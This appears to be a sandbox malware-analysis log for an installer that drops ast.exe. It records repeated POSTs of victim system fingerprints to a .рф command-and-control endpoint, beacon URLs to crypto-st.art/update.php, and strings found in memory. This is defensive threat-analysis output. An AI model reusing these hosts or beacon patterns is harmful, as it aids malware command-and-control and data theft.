                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B9009F0 recv,send,WSAGetLastError,10_2_6B9009F0
                          Source: global trafficDNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
                          Source: global trafficDNS traffic detected: DNS query: trs011.xn--80akicokc0aablc.xn--p1ai
                          Source: global trafficDNS traffic detected: DNS query: crypto-st.art
                          Source: unknownHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, is-VCJTB.tmp.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, is-VCJTB.tmp.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: ast.exe, 0000000A.00000002.2980985284.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php
                          Source: ast.exe, 0000000A.00000003.2973573202.0000000006088000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953370709.000000000608B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f40;a~8
                          Source: ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66
                          Source: ast.exe, 0000000A.00000003.2947103567.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66-80akicokc0aablc.x
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66/
                          Source: ast.exe, 0000000A.00000002.2992930514.0000000006088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b660
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b667
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66G
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Q
                          Source: ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Y
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66c
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66e
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66h
                          Source: ast.exe, 0000000A.00000003.2888461757.0000000006091000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66ln241119_8036.log
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66m
                          Source: ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66u
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66w
                          Source: ast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.phpy
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-VCJTB.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/e
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types?fr
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesYfT
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesntime1
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typespeg-tu
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesw)u
                          Source: ast.exe.9.drString found in binary or memory: http://www.indyproject.org/
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000000.1712569015.0000000000401000.00000020.00000001.01000000.00000004.sdmp, wjpP1EOX0L.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                          Source: wjpP1EOX0L.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022C2000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000002.00000003.2098213335.00000000022A5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ish
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022AC000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1710614762.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1713559295.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021FD000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.000000000234D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.ishAbout
                          Source: wjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021F5000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.0000000002345000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.kngstr.com/?PreDefines.isha
                          Source: ast.exe.9.drString found in binary or memory: http://www.openssl.org/)
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000361A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.drString found in binary or memory: http://www.openssl.org/V
